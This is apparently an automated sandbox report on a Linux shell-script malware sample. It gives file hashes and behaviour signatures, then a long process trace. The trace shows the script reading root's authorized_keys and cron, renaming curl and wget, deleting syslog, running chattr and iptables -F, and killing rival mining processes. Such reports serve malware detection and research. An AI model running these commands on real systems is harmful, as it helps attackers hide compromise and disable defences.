Analysis
-
max time kernel
150s -
max time network
10s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240226-en -
resource tags
arch:mipsel image:debian9-mipsel-20240226-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
24-01-2025 04:09
Static task
static1
Behavioral task
behavioral1
Sample
196b528e7c816ef6dc101e193bb73338e2e6c696137302f991099682e52bc910.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
196b528e7c816ef6dc101e193bb73338e2e6c696137302f991099682e52bc910.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
196b528e7c816ef6dc101e193bb73338e2e6c696137302f991099682e52bc910.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
196b528e7c816ef6dc101e193bb73338e2e6c696137302f991099682e52bc910.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
196b528e7c816ef6dc101e193bb73338e2e6c696137302f991099682e52bc910.sh
-
Size
37KB
-
MD5
d6648f420423f9dad4292a606f743c4b
-
SHA1
dcae47ec15e96274a39fcce4352077846ebf7b70
-
SHA256
196b528e7c816ef6dc101e193bb73338e2e6c696137302f991099682e52bc910
-
SHA512
3820b4fb435732fef05157ff0713ed3a62269dc1c21240dbf7e2e59191a0f34050247573b4d9758cd84495fb28d8f346e381b8f09a9041c70ca88333b1303f93
-
SSDEEP
384:Q7pQQwQHDf6lpTWg3vM4Qdre21jT58vKpG2Y0orcfKLUv0KZnNEVdUeUoJpJydIi:Q7xFNB48Fkc2zq0xvMGdl18r
Malware Config
Signatures
-
Flushes firewall rules 1 TTPs 1 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
pid Process 735 iptables -
Attempts to change immutable files 64 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com -
Reads CPU attributes 1 TTPs 64 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online sysctl -
Process Discovery 1 TTPs 64 IoCs
Adversaries may try to discover information about running processes.
-
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1076 grep 1106 grep 1352 grep -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/dev/null 196b528e7c816ef6dc101e193bb73338e2e6c696137302f991099682e52bc910.sh
Processes
-
/tmp/196b528e7c816ef6dc101e193bb73338e2e6c696137302f991099682e52bc910.sh/tmp/196b528e7c816ef6dc101e193bb73338e2e6c696137302f991099682e52bc910.sh1⤵
- Writes file to tmp directory
PID:696 -
/usr/bin/curlcurl http://ip-api.com/json/2⤵PID:697
-
-
/bin/grepgrep -i CN2⤵PID:699
-
-
/bin/sedsed "s/,/\\n/g"2⤵PID:698
-
-
/bin/syncsync2⤵PID:720
-
-
/bin/catcat /var/spool/cron/2⤵PID:722
-
-
/bin/catcat /root/.ssh/authorized_keys2⤵PID:724
-
-
/bin/mvmv /usr/bin/curl /usr/bin/url2⤵PID:725
-
-
/bin/mvmv /usr/bin/url /usr/bin/cd12⤵PID:726
-
-
/bin/mvmv /usr/bin/wget /usr/bin/get2⤵PID:728
-
-
/bin/mvmv /usr/bin/get /usr/bin/wd12⤵PID:729
-
-
/bin/rmrm -rf /var/log/syslog2⤵PID:731
-
-
/usr/bin/chattrchattr -iua /tmp/2⤵PID:733
-
-
/usr/bin/chattrchattr -iua /var/tmp/2⤵PID:734
-
-
/sbin/iptablesiptables -F2⤵
- Flushes firewall rules
PID:735
-
-
/usr/sbin/userdeluserdel akay2⤵PID:739
-
-
/usr/sbin/userdeluserdel vfinder2⤵PID:740
-
-
/bin/rmrm -rf "/tmp/addres*"2⤵PID:741
-
-
/bin/rmrm -rf "/tmp/walle*"2⤵PID:742
-
-
/bin/rmrm -rf /tmp/keys2⤵PID:743
-
-
/bin/grepgrep -i "[a]liyun"2⤵
- Attempts to change immutable files
PID:745
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:744
-
-
/bin/grepgrep -i "[y]unjing"2⤵PID:748
-
-
/bin/psps aux2⤵
- Process Discovery
PID:747
-
-
/bin/rmrm -f /tmp/.null2⤵PID:749
-
-
/sbin/sysctlsysctl -w "vm.nr_hugepages=128"2⤵
- Reads CPU attributes
PID:750
-
-
/bin/grepgrep 185.71.65.2382⤵PID:752
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:754
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:753
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:755
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:758
-
-
/bin/grepgrep 140.82.52.872⤵PID:757
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:760
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:759
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:763
-
-
/bin/grepgrep :4432⤵PID:762
-
-
/bin/grepgrep -v -2⤵PID:765
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:766
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:764
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:769
-
-
/bin/grepgrep :232⤵PID:768
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:772
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:770
-
-
/bin/grepgrep -v -2⤵PID:771
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:776
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:775
-
-
/bin/grepgrep :4432⤵PID:774
-
-
/bin/grepgrep -v -2⤵PID:777
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:778
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:782
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:781
-
-
/bin/grepgrep :1432⤵PID:780
-
-
/bin/grepgrep -v -2⤵PID:783
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:784
-
-
/bin/grepgrep :22222⤵PID:786
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:787
-
-
/bin/grepgrep -v -2⤵PID:789
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:788
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:790
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:794
-
-
/bin/grepgrep :33332⤵PID:792
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:793
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:796
-
-
/bin/grepgrep -v -2⤵PID:795
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:800
-
-
/bin/grepgrep :33892⤵PID:798
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:802
-
-
/bin/grepgrep -v -2⤵PID:801
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:799
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:805
-
-
/bin/grepgrep :55552⤵PID:804
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:806
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:808
-
-
/bin/grepgrep -v -2⤵PID:807
-
-
/bin/grepgrep :66662⤵PID:810
-
-
/bin/grepgrep -v -2⤵PID:813
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:814
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:811
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:812
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:817
-
-
/bin/grepgrep :66652⤵PID:816
-
-
/bin/grepgrep -v -2⤵PID:819
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:818
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:820
-
-
/bin/grepgrep :66672⤵PID:822
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:824
-
-
/bin/grepgrep -v -2⤵PID:825
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:823
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:826
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:829
-
-
/bin/grepgrep :77772⤵PID:828
-
-
/bin/grepgrep -v -2⤵PID:831
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:832
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:830
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:835
-
-
/bin/grepgrep -v -2⤵PID:837
-
-
/bin/grepgrep :84442⤵PID:834
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:836
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:838
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:841
-
-
/bin/grepgrep -v -2⤵PID:843
-
-
/bin/grepgrep :33472⤵PID:840
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:844
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:842
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:849
-
-
/bin/grepgrep :33332⤵PID:847
-
-
/bin/grepgrep -v grep2⤵PID:846
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:848
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:845
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:856
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:857
-
-
/bin/psps aux2⤵
- Process Discovery
PID:853
-
-
/bin/grepgrep :55552⤵PID:855
-
-
/bin/grepgrep -v grep2⤵PID:854
-
-
/bin/grepgrep "kworker -c\\"2⤵PID:860
-
-
/bin/grepgrep -v grep2⤵PID:859
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:862
-
-
/bin/psps aux2⤵
- Process Discovery
PID:858
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:861
-
-
/bin/grepgrep -v grep2⤵PID:864
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:863
-
-
/bin/grepgrep log_2⤵PID:865
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:866
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:867
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:871
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:872
-
-
/bin/grepgrep -v grep2⤵PID:869
-
-
/bin/grepgrep systemten2⤵PID:870
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:868
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:876
-
-
/bin/grepgrep netns2⤵PID:875
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:877 -
/usr/local/sbin/killkill -9 103⤵PID:878
-
-
/usr/local/bin/killkill -9 103⤵PID:878
-
-
/usr/sbin/killkill -9 103⤵PID:878
-
-
/usr/bin/killkill -9 103⤵PID:878
-
-
/sbin/killkill -9 103⤵PID:878
-
-
/bin/killkill -9 103⤵PID:878
-
-
-
/bin/grepgrep -v grep2⤵PID:874
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:873
-
-
/bin/grepgrep voltuned2⤵PID:881
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:879
-
-
/bin/grepgrep -v grep2⤵PID:880
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:882
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:883
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:887
-
-
/bin/grepgrep darwin2⤵PID:886
-
-
/bin/grepgrep -v grep2⤵PID:885
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:888
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:884
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:894
-
-
/bin/grepgrep /tmp/dl2⤵PID:893
-
-
/bin/grepgrep -v grep2⤵PID:892
-
-
/bin/psps aux2⤵
- Process Discovery
PID:891
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:895
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:900
-
-
/bin/grepgrep /tmp/ddg2⤵PID:899
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:901
-
-
/bin/grepgrep -v grep2⤵PID:898
-
-
/bin/psps aux2⤵
- Process Discovery
PID:897
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:906
-
-
/bin/grepgrep /tmp/pprt2⤵PID:905
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:907
-
-
/bin/psps aux2⤵PID:903
-
-
/bin/grepgrep -v grep2⤵PID:904
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:913
-
-
/bin/grepgrep /tmp/ppol2⤵PID:912
-
-
/bin/grepgrep -v grep2⤵PID:911
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:914
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:910
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:921
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:920
-
-
/bin/grepgrep "/tmp/65ccE*"2⤵PID:919
-
-
/bin/grepgrep -v grep2⤵PID:918
-
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:917
-
-
/bin/grepgrep -v grep2⤵PID:923
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:926
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:922
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:925
-
-
/bin/grepgrep "/tmp/jmx*"2⤵PID:924
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:932
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:933
-
-
/bin/grepgrep -v grep2⤵PID:930
-
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:929
-
-
/bin/grepgrep "/tmp/2Ne80*"2⤵PID:931
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:939
-
-
/bin/grepgrep IOFoqIgyC0zmf2UR2⤵PID:938
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:940
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:936
-
-
/bin/grepgrep -v grep2⤵PID:937
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:945
-
-
/bin/grepgrep -v grep2⤵PID:943
-
-
/bin/psps aux2⤵
- Process Discovery
PID:942
-
-
/bin/grepgrep 45.76.122.922⤵PID:944
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:946
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:952
-
-
/bin/grepgrep 51.38.191.1782⤵PID:951
-
-
/bin/grepgrep -v grep2⤵PID:950
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:953
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:949
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:958
-
-
/bin/grepgrep 51.15.56.1612⤵PID:957
-
-
/bin/grepgrep -v grep2⤵PID:956
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:959
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:955
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:965
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:966
-
-
/bin/grepgrep -v grep2⤵PID:963
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:962
-
-
/bin/grepgrep 86s.jpg2⤵PID:964
-
-
/bin/grepgrep aGTSGJJp2⤵PID:971
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:972
-
-
/bin/grepgrep -v grep2⤵PID:970
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:973
-
-
/bin/psps aux2⤵
- Process Discovery
PID:969
-
-
/bin/grepgrep nMrfmnRa2⤵PID:977
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:978
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:975
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:979
-
-
/bin/grepgrep -v grep2⤵PID:976
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:985
-
-
/bin/grepgrep PuNY5tm22⤵PID:984
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:986
-
-
/bin/grepgrep -v grep2⤵PID:983
-
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:982
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:991
-
-
/bin/grepgrep I0r8Jyyt2⤵PID:990
-
-
/bin/grepgrep -v grep2⤵PID:989
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:992
-
-
/bin/psps aux2⤵PID:988
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:998
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:999
-
-
/bin/grepgrep -v grep2⤵PID:996
-
-
/bin/grepgrep AgdgACUD2⤵PID:997
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:995
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1004
-
-
/bin/grepgrep -v grep2⤵PID:1002
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1005
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1001
-
-
/bin/grepgrep uiZvwxG82⤵PID:1003
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1010
-
-
/bin/grepgrep -v grep2⤵PID:1008
-
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:1007
-
-
/bin/grepgrep hahwNEdB2⤵PID:1009
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1011
-
-
/bin/grepgrep -v grep2⤵PID:1016
-
-
/bin/grepgrep BtwXn5qH2⤵PID:1017
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1018
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1015
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1019
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1025
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1021
-
-
/bin/grepgrep 3XEzey2T2⤵PID:1023
-
-
/bin/grepgrep -v grep2⤵PID:1022
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1024
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1031
-
-
/bin/grepgrep t2tKrCSZ2⤵PID:1030
-
-
/bin/grepgrep -v grep2⤵PID:1029
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1032
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1028
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1040
-
-
/bin/grepgrep svc2⤵PID:1039
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1041
-
-
/bin/grepgrep -v grep2⤵PID:1038
-
-
/bin/psps aux2⤵PID:1037
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1045
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1046
-
-
/bin/grepgrep -v grep2⤵PID:1043
-
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:1042
-
-
/bin/grepgrep HD7fcBgg2⤵PID:1044
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1052
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1053
-
-
/bin/grepgrep -v grep2⤵PID:1050
-
-
/bin/grepgrep zXcDajSs2⤵PID:1051
-
-
/bin/psps aux2⤵PID:1049
-
-
/bin/grepgrep 3lmigMo2⤵PID:1058
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1060
-
-
/bin/grepgrep -v grep2⤵PID:1057
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:1056
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1059
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1065
-
-
/bin/grepgrep AkMK4A22⤵PID:1064
-
-
/bin/grepgrep -v grep2⤵PID:1063
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1066
-
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:1062
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1071
-
-
/bin/grepgrep AJ2AkKe2⤵PID:1070
-
-
/bin/grepgrep -v grep2⤵PID:1069
-
-
/bin/psps aux2⤵
- Process Discovery
PID:1068
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1072
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1077
-
-
/bin/grepgrep HiPxCJRS2⤵
- System Network Configuration Discovery
PID:1076
-
-
/bin/grepgrep -v grep2⤵PID:1075
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1078
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:1074
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1083
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1079
-
-
/bin/grepgrep -v grep2⤵PID:1080
-
-
/bin/grepgrep http_0xCC0302⤵PID:1081
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1082
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1087
-
-
/bin/grepgrep http_0xCC0312⤵PID:1086
-
-
/bin/grepgrep -v grep2⤵PID:1085
-
-
/bin/psps aux2⤵
- Reads runtime system information
PID:1084
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1088
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1092
-
-
/bin/grepgrep http_0xCC0322⤵PID:1091
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1093
-
-
/bin/grepgrep -v grep2⤵PID:1090
-
-
/bin/psps aux2⤵
- Reads runtime system information
PID:1089
-
-
/bin/grepgrep http_0xCC0332⤵PID:1096
-
-
/bin/grepgrep -v grep2⤵PID:1095
-
-
/bin/psps aux2⤵
- Process Discovery
PID:1094
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1098
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1097
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1103
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1102
-
-
/bin/grepgrep C4iLM4L2⤵PID:1101
-
-
/bin/grepgrep -v grep2⤵PID:1100
-
-
/bin/psps aux2⤵PID:1099
-
-
/bin/grepgrep aziplcr72qjhzvin2⤵
- System Network Configuration Discovery
PID:1106
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1107
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1108
-
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:1104
-
-
/bin/grepgrep -v grep2⤵PID:1105
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1112
-
-
/bin/grepgrep -v grep2⤵PID:1110
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1109
-
-
/usr/bin/awkawk "{ if(substr(\$11,1,2)==\"./\" && substr(\$12,1,2)==\"./\") print \$2 }"2⤵PID:1111
-
-
/bin/grepgrep /boot/vmlinuz2⤵PID:1115
-
-
/bin/grepgrep -v grep2⤵PID:1114
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1117
-
-
/bin/psps aux2⤵
- Process Discovery
PID:1113
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1116
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1121
-
-
/bin/grepgrep i4b503a52cc52⤵PID:1120
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1122
-
-
/bin/grepgrep -v grep2⤵PID:1119
-
-
/bin/psps aux2⤵
- Reads runtime system information
PID:1118
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1126
-
-
/bin/grepgrep dgqtrcst23rtdi3ldqk322j22⤵PID:1125
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1127
-
-
/bin/grepgrep -v grep2⤵PID:1124
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1123
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1131
-
-
/bin/grepgrep 2g0uv7npuhrlatd2⤵PID:1130
-
-
/bin/grepgrep -v grep2⤵PID:1129
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1132
-
-
/bin/psps aux2⤵PID:1128
-
-
/bin/grepgrep nqscheduler2⤵PID:1135
-
-
/bin/grepgrep -v grep2⤵PID:1134
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1136
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1137
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1133
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1141
-
-
/bin/grepgrep rkebbwgqpl4npmm2⤵PID:1140
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1142
-
-
/bin/grepgrep -v grep2⤵PID:1139
-
-
/bin/psps aux2⤵PID:1138
-
-
/bin/grepgrep -v aux2⤵PID:1145
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1148
-
-
/usr/bin/awkawk "\$3>10.0{print \$2}"2⤵PID:1147
-
-
/bin/grepgrep -v grep2⤵PID:1144
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1143
-
-
/bin/grepgrep "]"2⤵PID:1146
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1152
-
-
/bin/grepgrep 2fhtu70teuhtoh78jc5s2⤵PID:1151
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1153
-
-
/bin/grepgrep -v grep2⤵PID:1150
-
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:1149
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1158
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1157
-
-
/bin/grepgrep 0kwti6ut420t2⤵PID:1156
-
-
/bin/grepgrep -v grep2⤵PID:1155
-
-
/bin/psps aux2⤵PID:1154
-
-
/bin/grepgrep 44ct7udt0patws3agkdfqnjm2⤵PID:1161
-
-
/bin/grepgrep -v grep2⤵PID:1160
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1163
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1159
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1162
-
-
/bin/grepgrep -v -2⤵PID:1167
-
-
/bin/grepgrep -v grep2⤵PID:1165
-
-
/bin/grepgrep -v _2⤵PID:1168
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1164
-
-
/bin/grepgrep -v /2⤵PID:1166
-
-
/usr/bin/awkawk "length(\$11)>19{print \$2}"2⤵PID:1169
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1170
-
-
/bin/grepgrep -v grep2⤵PID:1173
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1175
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1176
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1172
-
-
/bin/grepgrep "\\[^"2⤵PID:1174
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1182
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1181
-
-
/bin/grepgrep rsync2⤵PID:1180
-
-
/bin/grepgrep -v grep2⤵PID:1179
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1178
-
-
